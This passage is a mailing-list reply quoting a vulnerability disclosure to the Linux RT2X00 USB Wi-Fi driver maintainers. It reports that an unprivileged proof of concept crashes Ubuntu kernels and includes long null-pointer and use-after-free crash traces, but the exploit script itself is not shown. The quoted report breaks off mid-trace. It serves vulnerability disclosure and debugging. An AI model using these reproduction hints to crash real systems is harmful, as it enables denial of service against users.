Please see discussion in https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2073500 On Fri, Aug 02, 2024 at 03:57:47PM +0800, color Ice wrote: > Dear RT2X00 driver maintainers, > > We have discovered a critical vulnerability in the RT2X00 driver. We > recommend urgently submitting an update. > > *Vulnerability Description*: When a PC is running Ubuntu 22.04 or 24.04, > executing our proof of concept (POC) can directly cause a null pointer > dereference or use-after-free (UAF). The systems we tested were: > > - *Description*: Ubuntu 22.04.4 LTS *Release*: 22.04 > - *Description*: Ubuntu 24.04 LTS *Release*: 24.04 > > We tested network cards from the RT2870/RT3070/RT5370 series, which all > belong to the RT2X00 driver group, and all were able to trigger the > vulnerability. Additionally, executing the POC requires only user-level > privileges. Debian systems are not affected. It is unclear if Ubuntu is the only affected distro. > Now, there are a few issues that need to be discussed. When executing the > POC on different PCs, it not only triggers a null pointer dereference but > also occasionally triggers a use-after-free (UAF) issue. You can test this > issue yourselves. > > *POC Execution Method*: > > python3 poc.py > > Some systems might be affected by the time.sleep function. If you cannot > successfully reproduce the issue, please modify time.sleep(0.1) in the > script to time.sleep(0.2). Below, I will provide the logs of the null > pointer dereference and UAF from our kernel for analysis. > > Replace the VID and PID with your USB network card ID, which you can check > using lsusb. > > -------------- > > > Crash Log-Null Pointer > > > [ 371.188382] ieee80211 phy23: rt2x00lib_request_firmware: Info - Loading > firmware file 'rt2870.bin' > [ 371.188467] ieee80211 phy23: rt2x00lib_request_firmware: Info - Firmware > detected - version: 0.36 > [ 371.258315] BUG: kernel NULL pointer dereference, address: > 0000000000000038 > [ 371.258324] #PF: supervisor write access in kernel mode > [ 371.258328] #PF: error_code(0x0002) - not-present page > [ 371.258330] PGD 0 P4D 0 > [ 371.258335] Oops: 0002 [#1] PREEMPT SMP NOPTI > [ 371.258339] CPU: 8 PID: 144 Comm: kworker/u40:2 Not tainted > 6.8.0-40-generic #40~22.04.2-Ubuntu > [ 371.258344] Hardware name: Dell Inc. Vostro 3710/072TMP, BIOS 1.1.66 > 06/22/2022 > [ 371.258346] Workqueue: phy23 rt2x00usb_work_rxdone [rt2x00usb] > [ 371.258363] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb] > [ 371.258374] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 > c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 > <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b > [ 371.258377] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246 > [ 371.258381] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: > 0000000000000000 > [ 371.258383] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: > ffff8b1d0be0e000 > [ 371.258386] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: > 0000000000000000 > [ 371.258388] R10: 0000000000000000 R11: 0000000000000000 R12: > ffffa1de4063fe08 > [ 371.258390] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: > ffff8b1ef7366a90 > [ 371.258392] FS: 0000000000000000(0000) GS:ffff8b207f600000(0000) > knlGS:0000000000000000 > [ 371.258395] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ 371.258397] CR2: 0000000000000038 CR3: 000000044d43c000 CR4: > 0000000000f50ef0 > [ 371.258400] PKRU: 55555554 > [ 371.258402] Call Trace: > [ 371.258405] <TASK> > [ 371.258408] ? show_regs+0x6d/0x80 > [ 371.258416] ? __die+0x24/0x80 > [ 371.258419] ? page_fault_oops+0x99/0x1b0 > [ 371.258425] ? do_user_addr_fault+0x2ed/0x670 > [ 371.258430] ? exc_page_fault+0x83/0x1b0 > [ 371.258437] ? asm_exc_page_fault+0x27/0x30 > [ 371.258444] ? rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb] > [ 371.258454] ? rt2x00usb_work_rxdone+0x8b/0xc0 [rt2x00usb] > [ 371.258463] process_one_work+0x16c/0x350 > [ 371.258470] worker_thread+0x306/0x440 > [ 371.258476] ? __pfx_worker_thread+0x10/0x10 > [ 371.258482] kthread+0xef/0x120 > [ 371.258486] ? __pfx_kthread+0x10/0x10 > [ 371.258491] ret_from_fork+0x44/0x70 > [ 371.258495] ? __pfx_kthread+0x10/0x10 > [ 371.258499] ret_from_fork_asm+0x1b/0x30 > [ 371.258505] </TASK> > [ 371.258506] Modules linked in: ccm snd_hda_codec_hdmi rfcomm xe > snd_hda_codec_cs8409 snd_hda_codec_generic drm_gpuvm drm_exec gpu_sched > drm_suballoc_helper drm_ttm_helper cmac algif_hash overlay algif_skcipher > af_alg bnep intel_uncore_frequency intel_uncore_frequency_common > snd_sof_pci_intel_tgl x86_pkg_temp_thermal snd_sof_intel_hda_common > intel_powerclamp coretemp soundwire_intel snd_sof_intel_hda_mlink > soundwire_cadence snd_sof_intel_hda kvm_intel snd_sof_pci > snd_sof_xtensa_dsp snd_sof kvm snd_sof_utils snd_soc_hdac_hda > snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi > soundwire_generic_allocation irqbypass soundwire_bus crct10dif_pclmul > polyval_clmulni polyval_generic ghash_clmulni_intel binfmt_misc > snd_usb_audio snd_soc_core sha256_ssse3 sha1_ssse3 snd_usbmidi_lib > aesni_intel rtw88_8821ce snd_compress snd_ump ac97_bus mc rtw88_8821c > rt2800usb snd_pcm_dmaengine rtw88_pci rt2x00usb crypto_simd cryptd > snd_hda_intel rt2800lib dell_wmi snd_seq_midi snd_intel_dspcfg rtw88_core > snd_intel_sdw_acpi snd_seq_midi_event > [ 371.258573] rt2x00lib dell_smbios rapl snd_hda_codec btusb snd_rawmidi > mei_pxp mei_hdcp intel_rapl_msr dcdbas nls_iso8859_1 intel_cstate i915 > mac80211 snd_hda_core dell_wmi_ddv btrtl snd_seq dell_smm_hwmon > processor_thermal_device_pci snd_hwdep btintel cmdlinepart > processor_thermal_device drm_buddy dell_wmi_sysman btbcm ledtrig_audio > processor_thermal_wt_hint ttm firmware_attributes_class sparse_keymap > dell_wmi_descriptor wmi_bmof snd_pcm spi_nor btmtk processor_thermal_rfim > snd_seq_device mtd ee1004 snd_timer drm_display_helper > processor_thermal_rapl cfg80211 bluetooth intel_rapl_common cec snd mei_me > pl2303 processor_thermal_wt_req rc_core ecdh_generic > processor_thermal_power_floor usbserial input_leds joydev mei i2c_algo_bit > libarc4 ecc soundcore processor_thermal_mbox int340x_thermal_zone > intel_pmc_core intel_vsec int3400_thermal pmt_telemetry acpi_thermal_rel > pmt_class acpi_tad acpi_pad mac_hid sch_fq_codel msr parport_pc ppdev lp > parport efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid nvme > [ 371.258648] crc32_pclmul i2c_i801 spi_intel_pci nvme_core i2c_smbus > r8169 spi_intel ahci nvme_auth xhci_pci video xhci_pci_renesas libahci > realtek wmi > [ 371.258665] CR2: 0000000000000038 > [ 371.258668] ---[ end trace 0000000000000000 ]--- > [ 371.785813] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb] > [ 371.785851] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 > c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 > <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b > [ 371.785854] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246 > [ 371.785861] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: > 0000000000000000 > [ 371.785863] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: > ffff8b1d0be0e000 > [ 371.785864] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: > 0000000000000000 > [ 371.785866] R10: 0000000000000000 R11: 0000000000000000 R12: > ffffa1de4063fe08 > [ 371.785867] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: > ffff8b1ef7366a90 > [ 371.785868] FS: 0000000000000000(0000) GS:ffff8b207f600000(0000) > knlGS:0000000000000000 > [ 371.785870] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ 371.785872] CR2: 0000000000000038 CR3: 000000011dc92000 CR4: > 0000000000f50ef0 > [ 371.785873] PKRU: 55555554 > [ 371.785876] note: kworker/u40:2[144] exited with irqs disabled > [ 371.793418] ieee80211 phy23: rt2800_wait_bbp_ready: Error - BBP register > access failed, aborting > [ 371.793422] ieee80211 phy23: rt2800usb_set_device_state: Error - Device > failed to enter state 4 (-5) > [ 371.799526] systemd-journald[438]: Compressed data object 1029 -> 509 > using ZSTD > [ 371.799553] systemd-journald[438]: Compressed data object 1020 -> 543 > using ZSTD > [ 387.857111] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.857138] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.861450] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.861472] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.865327] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.865344] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.872995] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.873032] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.961986] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 387.962012] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.018331] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.018398] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.067180] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.067201] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.323049] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 388.323086] systemd-journald[438]: Successfully sent stream file > descriptor to service manager. > [ 453.167476] systemd-journald[438]: Sent WATCHDOG=1 notification. > > > > LOG-Crash-2:UAF > > > > [ +0.000002] refcount_t: addition on 0; use-after-free. > [ +0.000006] WARNING: CPU: 16 PID: 754 at lib/refcount.c:25 > refcount_warn_saturate+0x12e/0x150 > [ +0.000007] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib > tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth > ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo > xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack > ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat > nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink > bridge stp llc overlay intel_rapl_msr intel_rapl_common > snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi > snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi > mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec > mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd > snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul > snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 > polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi > gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper > nls_iso8859_1 ttm crypto_simd > [ +0.000095] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device > snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper > eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid > sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables > x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid > mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile > crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core > xhci_pci_renesas realtek nvme_common wmi > [ +0.000063] CPU: 16 PID: 754 Comm: NetworkManager Not tainted > 6.5.0-41-generic #41~22.04.2-Ubuntu > [ +0.000003] Hardware name: System manufacturer System Product Name/TUF > GAMING X570-PLUS, BIOS 3603 03/20/2021 > [ +0.000001] RIP: 0010:refcount_warn_saturate+0x12e/0x150 > [ +0.000003] Code: 1d a5 cc dc 01 80 fb 01 0f 87 6c f8 8d 00 83 e3 01 0f > 85 52 ff ff ff 48 c7 c7 10 c0 1c a8 c6 05 85 cc dc 01 01 e8 d2 9f 8f ff > <0f> 0b e9 38 ff ff ff 48 c7 c7 e8 bf 1c a8 c6 05 6c cc dc 01 01 e8 > [ +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246 > [ +0.000003] RAX: 0000000000000000 RBX: 0000000000000000 RCX: > 0000000000000000 > [ +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: > 0000000000000000 > [ +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: > ffff919769c2e800 > [ +0.000002] R13: ffff91954a975000 R14: 0000000000000820 R15: > 00000000ffffff00 > [ +0.000002] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) > knlGS:0000000000000000 > [ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000001] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: > 0000000000750ee0 > [ +0.000002] PKRU: 55555554 > [ +0.000001] Call Trace: > [ +0.000002] <TASK> > [ +0.000003] ? show_regs+0x6d/0x80 > [ +0.000005] ? __warn+0x89/0x160 > [ +0.000004] ? refcount_warn_saturate+0x12e/0x150 > [ +0.000003] ? report_bug+0x17e/0x1b0 > [ +0.000005] ? handle_bug+0x46/0x90 > [ +0.000004] ? exc_invalid_op+0x18/0x80 > [ +0.000003] ? asm_exc_invalid_op+0x1b/0x20 > [ +0.000006] ? refcount_warn_saturate+0x12e/0x150 > [ +0.000003] ? refcount_warn_saturate+0x12e/0x150 > [ +0.000003] usb_get_urb+0x52/0x90 > [ +0.000004] usb_hcd_submit_urb+0x23/0x2e0 > [ +0.000003] usb_submit_urb+0x254/0x6c0 > [ +0.000006] rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb] > [ +0.000006] rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb] > [ +0.000005] rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib] > [ +0.000008] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib] > [ +0.000007] rt2x00lib_start+0x87/0xd0 [rt2x00lib] > [ +0.000007] rt2x00mac_start+0x2d/0x80 [rt2x00lib] > [ +0.000007] drv_start+0x55/0x130 [mac80211] > [ +0.000033] ieee80211_do_open+0x353/0x7e0 [mac80211] > [ +0.000030] ieee80211_open+0x76/0xa0 [mac80211] > [ +0.000027] __dev_open+0x105/0x1d0 > [ +0.000004] __dev_change_flags+0x1b5/0x230 > [ +0.000003] dev_change_flags+0x27/0x80 > [ +0.000003] do_setlink+0x3a1/0xe60 > [ +0.000004] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? __nla_validate_parse+0x49/0x1e0 > [ +0.000005] __rtnl_newlink+0x6e5/0x770 > [ +0.000005] rtnl_newlink+0x48/0x80 > [ +0.000003] rtnetlink_rcv_msg+0x170/0x430 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10 > [ +0.000002] netlink_rcv_skb+0x5d/0x110 > [ +0.000005] rtnetlink_rcv+0x15/0x30 > [ +0.000003] netlink_unicast+0x1b3/0x2a0 > [ +0.000002] netlink_sendmsg+0x25e/0x4e0 > [ +0.000004] ____sys_sendmsg+0x3ef/0x420 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ___sys_sendmsg+0x9a/0xf0 > [ +0.000004] ? kvfree+0x31/0x40 > [ +0.000005] __sys_sendmsg+0x89/0xf0 > [ +0.000004] __x64_sys_sendmsg+0x1d/0x30 > [ +0.000001] x64_sys_call+0x114d/0x20b0 > [ +0.000003] do_syscall_64+0x55/0x90 > [ +0.000002] ? __rseq_handle_notify_resume+0x37/0x70 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? exit_to_user_mode_prepare+0x30/0xb0 > [ +0.000001] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000001] ? do_syscall_64+0x61/0x90 > [ +0.000002] ? do_syscall_64+0x61/0x90 > [ +0.000002] entry_SYSCALL_64_after_hwframe+0x73/0xdd > [ +0.000002] RIP: 0033:0x7bfb4872799d > [ +0.000021] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 > ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 > <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48 > [ +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: > 000000000000002e > [ +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: > 00007bfb4872799d > [ +0.000002] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: > 000000000000000c > [ +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: > 0000000000000000 > [ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: > 0000000000000000 > [ +0.000003] </TASK> > [ +0.000001] ---[ end trace 0000000000000000 ]--- > [ +0.000004] ------------[ cut here ]------------ > [ +0.000001] refcount_t: underflow; use-after-free. > [ +0.000004] WARNING: CPU: 16 PID: 754 at lib/refcount.c:28 > refcount_warn_saturate+0xa3/0x150 > [ +0.000003] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib > tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth > ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo > xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack > ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat > nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink > bridge stp llc overlay intel_rapl_msr intel_rapl_common > snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi > snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi > mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec > mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd > snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul > snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 > polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi > gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper > nls_iso8859_1 ttm crypto_simd > [ +0.000055] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device > snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper > eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid > sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables > x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid > mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile > crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core > xhci_pci_renesas realtek nvme_common wmi > [ +0.000036] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G W > 6.5.0-41-generic #41~22.04.2-Ubuntu > [ +0.000002] Hardware name: System manufacturer System Product Name/TUF > GAMING X570-PLUS, BIOS 3603 03/20/2021 > [ +0.000001] RIP: 0010:refcount_warn_saturate+0xa3/0x150 > [ +0.000002] Code: 94 00 0f b6 1d 2b cd dc 01 80 fb 01 0f 87 df f8 8d 00 > 83 e3 01 75 dd 48 c7 c7 40 c0 1c a8 c6 05 0f cd dc 01 01 e8 5d a0 8f ff > <0f> 0b eb c6 0f b6 1d 02 cd dc 01 80 fb 01 0f 87 9f f8 8d 00 83 e3 > [ +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246 > [ +0.000001] RAX: 0000000000000000 RBX: 0000000000000000 RCX: > 0000000000000000 > [ +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: > 0000000000000000 > [ +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: > 00000000fffffffe > [ +0.000001] R13: ffff91954a975000 R14: 0000000000000820 R15: > 00000000ffffff00 > [ +0.000001] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) > knlGS:0000000000000000 > [ +0.000001] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000002] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: > 0000000000750ee0 > [ +0.000001] PKRU: 55555554 > [ +0.000001] Call Trace: > [ +0.000001] <TASK> > [ +0.000001] ? show_regs+0x6d/0x80 > [ +0.000002] ? __warn+0x89/0x160 > [ +0.000003] ? refcount_warn_saturate+0xa3/0x150 > [ +0.000002] ? report_bug+0x17e/0x1b0 > [ +0.000003] ? handle_bug+0x46/0x90 > [ +0.000002] ? exc_invalid_op+0x18/0x80 > [ +0.000003] ? asm_exc_invalid_op+0x1b/0x20 > [ +0.000003] ? refcount_warn_saturate+0xa3/0x150 > [ +0.000003] ? refcount_warn_saturate+0xa3/0x150 > [ +0.000001] usb_free_urb+0x67/0x80 > [ +0.000003] usb_hcd_submit_urb+0x14e/0x2e0 > [ +0.000002] usb_submit_urb+0x254/0x6c0 > [ +0.000003] rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb] > [ +0.000005] rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb] > [ +0.000003] rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib] > [ +0.000006] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib] > [ +0.000005] rt2x00lib_start+0x87/0xd0 [rt2x00lib] > [ +0.000005] rt2x00mac_start+0x2d/0x80 [rt2x00lib] > [ +0.000005] drv_start+0x55/0x130 [mac80211] > [ +0.000025] ieee80211_do_open+0x353/0x7e0 [mac80211] > [ +0.000028] ieee80211_open+0x76/0xa0 [mac80211] > [ +0.000026] __dev_open+0x105/0x1d0 > [ +0.000004] __dev_change_flags+0x1b5/0x230 > [ +0.000003] dev_change_flags+0x27/0x80 > [ +0.000003] do_setlink+0x3a1/0xe60 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? __nla_validate_parse+0x49/0x1e0 > [ +0.000004] __rtnl_newlink+0x6e5/0x770 > [ +0.000005] rtnl_newlink+0x48/0x80 > [ +0.000002] rtnetlink_rcv_msg+0x170/0x430 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10 > [ +0.000002] netlink_rcv_skb+0x5d/0x110 > [ +0.000005] rtnetlink_rcv+0x15/0x30 > [ +0.000002] netlink_unicast+0x1b3/0x2a0 > [ +0.000003] netlink_sendmsg+0x25e/0x4e0 > [ +0.000003] ____sys_sendmsg+0x3ef/0x420 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000004] ___sys_sendmsg+0x9a/0xf0 > [ +0.000003] ? kvfree+0x31/0x40 > [ +0.000004] __sys_sendmsg+0x89/0xf0 > [ +0.000004] __x64_sys_sendmsg+0x1d/0x30 > [ +0.000002] x64_sys_call+0x114d/0x20b0 > [ +0.000002] do_syscall_64+0x55/0x90 > [ +0.000001] ? __rseq_handle_notify_resume+0x37/0x70 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000001] ? exit_to_user_mode_prepare+0x30/0xb0 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60 > [ +0.000002] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? do_syscall_64+0x61/0x90 > [ +0.000001] ? do_syscall_64+0x61/0x90 > [ +0.000002] entry_SYSCALL_64_after_hwframe+0x73/0xdd > [ +0.000002] RIP: 0033:0x7bfb4872799d > [ +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 > ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 > <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48 > [ +0.000002] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: > 000000000000002e > [ +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: > 00007bfb4872799d > [ +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: > 000000000000000c > [ +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: > 0000000000000000 > [ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: > 0000000000000000 > [ +0.000003] </TASK> > [ +0.000001] ---[ end trace 0000000000000000 ]--- > [ +0.000002] BUG: unable to handle page fault for address: 00000000000011b0 > [ +0.000003] #PF: supervisor read access in kernel mode > [ +0.000001] #PF: error_code(0x0000) - not-present page > [ +0.000002] PGD 0 P4D 0 > [ +0.000003] Oops: 0000 [#1] PREEMPT SMP NOPTI > [ +0.000002] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G W > 6.5.0-41-generic #41~22.04.2-Ubuntu > [ +0.000002] Hardware name: System manufacturer System Product Name/TUF > GAMING X570-PLUS, BIOS 3603 03/20/2021 > [ +0.000001] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb] > [ +0.000004] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f > 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 > <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31 > [ +0.000002] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206 > [ +0.000002] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: > 0000000000000000 > [ +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: > 00000000000011a0 > [ +0.000002] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: > 0000000000000000 > [ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: > ffff919567fab4f0 > [ +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: > ffff9196786a4000 > [ +0.000001] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) > knlGS:0000000000000000 > [ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: > 0000000000750ee0 > [ +0.000001] PKRU: 55555554 > [ +0.000001] Call Trace: > [ +0.000002] <TASK> > [ +0.000001] ? show_regs+0x6d/0x80 > [ +0.000003] ? __die+0x24/0x80 > [ +0.000003] ? page_fault_oops+0x99/0x1b0 > [ +0.000004] ? do_user_addr_fault+0x31d/0x6b0 > [ +0.000003] ? exc_page_fault+0x83/0x1b0 > [ +0.000003] ? asm_exc_page_fault+0x27/0x30 > [ +0.000003] ? __pfx_rt2x00usb_clear_entry+0x10/0x10 [rt2x00usb] > [ +0.000004] ? rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb] > [ +0.000005] ? rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib] > [ +0.000005] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib] > [ +0.000006] rt2x00lib_start+0x87/0xd0 [rt2x00lib] > [ +0.000005] rt2x00mac_start+0x2d/0x80 [rt2x00lib] > [ +0.000006] drv_start+0x55/0x130 [mac80211] > [ +0.000025] ieee80211_do_open+0x353/0x7e0 [mac80211] > [ +0.000028] ieee80211_open+0x76/0xa0 [mac80211] > [ +0.000027] __dev_open+0x105/0x1d0 > [ +0.000004] __dev_change_flags+0x1b5/0x230 > [ +0.000003] dev_change_flags+0x27/0x80 > [ +0.000004] do_setlink+0x3a1/0xe60 > [ +0.000004] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000002] ? __nla_validate_parse+0x49/0x1e0 > [ +0.000004] __rtnl_newlink+0x6e5/0x770 > [ +0.000006] rtnl_newlink+0x48/0x80 > [ +0.000003] rtnetlink_rcv_msg+0x170/0x430 > [ +0.000003] ? srso_alias_return_thunk+0x5/0x7f > [ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10 > [ +0.000003] 